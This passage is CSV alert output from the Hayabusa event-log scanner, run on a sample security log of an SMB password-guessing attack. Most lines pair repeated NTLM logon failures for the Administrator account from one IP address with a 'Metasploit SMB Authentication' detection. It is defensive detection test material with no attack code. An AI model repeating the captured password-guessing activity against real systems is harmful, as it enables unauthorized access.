NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hi1dzny6hpyr5N3d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RlPVBSnDMlE0QZaJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th72TwMoRXtDVWge : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KGTTiJSkErjzoUUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyzZwNLltF0cYnai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gYWVQ6mCqyBfDm3m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rg2x2lv9JeS5Bb6l : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fU28NKC3WYxFGbMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUWDXgnogGDXizWj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXhAtnNcQKOIsuGS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cKfrJwI3OGdjL4af : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VdekC160hU7YzrK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enOBuzd6jwu8rZCH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: eAjLjDlZSps5D49t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rY6CONLBVygSTnY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6FIHgz2yqqbD9zfV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d82RRXgSmZdnfa8I : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xA3ZWnWc9CoGeKpm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FvSYKi8KvEtnmSbs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IvxXI1u0AwtNHNSU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OFIy6Cps3Rm87Kqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: slL3aPBnZl3lVJst : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O98P1oP3AU4lZp2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
